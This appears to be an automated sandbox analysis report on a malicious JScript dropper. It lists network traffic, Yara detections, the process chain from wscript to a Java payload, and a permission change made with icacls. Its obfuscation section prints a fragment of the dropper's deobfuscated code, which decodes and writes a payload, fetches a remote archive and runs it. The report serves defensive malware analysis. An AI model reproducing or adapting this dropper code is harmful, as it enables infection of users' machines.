Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50090 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Potential malicious VBS/JS script found (suspicious encoded strings)
Source: 8NR95Z54o9.js Initial sample: Suspicious string .write LNDYAXRL
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: 8NR95Z54o9.js Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal100.troj.evad.winJS@6/4@5/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\qkviumto.txt Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 8NR95Z54o9.js ReversingLabs: Detection: 42%
Source: 8NR95Z54o9.js Virustotal: Detection: 53%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8NR95Z54o9.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\qkviumto.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\qkviumto.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript[vCFcYOq[47]](vCFcYOq[4]);var TZmcwL_oCK = EhujXBtwg_[vCFcYOq[48]](vCFcYOq[5]);var $vwoTow_rZ = EhujXBtwg_[vCFcYOq[48]](vCFcYOq[6]);var r = Math[vCFcYOq[50]]()[vCFcYOq[51]](36)[vCFcYOq[46]](/[^a-z]+/g, '')[vCFcYOq[53]](0, 10);var cJnqLRcRyb = $vwoTow_rZ + vCFcYOq[7] + r + vCFcYOq[8]var lE_WwLtDWo = decodeBase64(LHFsaavDEm);writeBytes(cJnqLRcRyb, lE_WwLtDWo);var NgbTLjJfnH = WScript[vCFcYOq[47]](vCFcYOq[9]);var eiehQ$KWpE = "";try{eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[10]);eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[11] + eiehQ$KWpE + vCFcYOq[12]);}catch(err){}try{if(eiehQ$KWpE == ""){eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[13]);eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[14] + eiehQ$KWpE + vCFcYOq[12]);if(eiehQ$KWpE != ""){eiehQ$KWpE = eiehQ$KWpE + vCFcYOq[16];}}else{eiehQ$KWpE = eiehQ$KWpE + vCFcYOq[16];}}catch(err){}try{if(eiehQ$KWpE != ""){EhujXBtwg_[vCFcYOq[59]](vCFcYOq[18] + eiehQ$KWpE + vCFcYOq[19] + cJnqLRcRyb + vCFcYOq[18]);} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var IuRBzWDASj = WScript[vCFcYOq[47]](vCFcYOq[21]);var USpdlVIuFC = WScript[vCFcYOq[47]](vCFcYOq[22]);IuRBzWDASj[vCFcYOq[62]](vCFcYOq[23], vCFcYOq[24], false);IuRBzWDASj[vCFcYOq[63]](2, 13056);IuRBzWDASj[vCFcYOq[64]]();USpdlVIuFC[vCFcYOq[65]] = 1;USpdlVIuFC[vCFcYOq[62]]();USpdlVIuFC.write(IuRBzWDASj[vCFcYOq[67]]);USpdlVIuFC[vCFcYOq[68]]($vwoTow_rZ + vCFcYOq[25], 2);break;}catch(err){WScript[vCFcYOq[69]](5000);}}while(true);UnZip($vwoTow_rZ + vCFcYOq[25], $vwoTow_rZ + vCFcYOq[27]);EhujXBtwg_[vCFcYOq[70]](vCFcYOq[28], vCFcYOq[18] + $vwoTow_rZ + vCFcYOq[30] + vCFcYOq[18] + cJnqLRcRyb + vCFcYOq[18], vCFcYOq[33]);EhujXBtwg_[vCFcYOq[59]](vCFcYOq[18] + $vwoTow_rZ + vCFcYOq[30] + vCFcYOq[18] + cJnqLRcRyb + vCFcYOq[18]);}function decodeBase64(base64){var DM = WScript[vCFcYOq[47]](vCFcYOq[38]);var EL = DM[vCFcYOq[73]](vCFcYOq[39]);EL[vCFcYOq[74]] = vCFcYOq[40];EL[vCFcYOq[75]] = base64;return EL[vCFcYOq[76]];}function writeBytes(file, bytes){var iXCQWeALg_ = WScript[vCFcYOq[47]](vCFcYOq[41]);iXCQWeALg_[vCFcYOq[65]] = 1;iXCQWeALg_[vCFcYOq[79]]();iXCQWeALg_[vCFcYOq[80]](bytes);iXCQWeALg_[vCFcYOq[81]](file, 2);}function UnZip(zipfile, ExtractTo){if(NgbTLjJfnH[vCFcYOq[82]](zipfile) == vCFcYOq[42]){if(!NgbTLjJfnH[vCFcYOq[83]](ExtractTo)){NgbTLjJfnH[vCFcYOq[84]](ExtractTo);}var axmrFsozuO = WScript[vCFcYOq[47]](vCFcYOq[43]);var EjlgNlRbUT = axmrFsozuO[vCFcYOq[86]](ExtractTo);var $ppNxKRaDu = axmrFsozuO[vCFcYOq[86]](zipfile)[vCFcYOq[88]]();for(i = 0; i < $ppNxKRaDu[vCFcYOq[89]]; i++){if(NgbTLjJfnH[vCFcYOq[90]](NgbTLjJfnH[vCFcYOq[91]](ExtractTo,$ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[93]])+vCFcYOq[44]+NgbTLjJfnH[vCFcYOq[94]]($ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[96]]))){NgbTLjJfnH[vCFcYOq[97]](NgbTLjJfnH[vCFcYOq[91]](ExtractTo,$ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[93]])+vCFcYOq[44]+NgbTLjJfnH[vCFcYOq[94]]($ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[96]]));}EjlgNlRbUT[vCFcYOq[104]]($ppNxKRaDu[vCFcYOq[92]](i), 20);}}}ITextStream.WriteLine(" exec:111 f:");ITextStream.
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021F23EC push es; retn 0001h 1_2_021F24FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021F246F push es; retn 0001h 1_2_021F24FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021E9091 push cs; retf 1_2_021E90B1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214D8F7 push 00000000h; mov dword ptr [esp], esp 1_2_0214D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214A21B push ecx; ret 1_2_0214A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214A20A push ecx; ret 1_2_0214A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214BB67 push 00000000h; mov dword ptr [esp], esp 1_2_0214BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214B3B7 push 00000000h; mov dword ptr [esp], esp 1_2_0214B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214D8E0 push 00000000h; mov dword ptr [esp], esp 1_2_0214D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214B947 push 00000000h; mov dword ptr [esp], esp 1_2_0214B96D
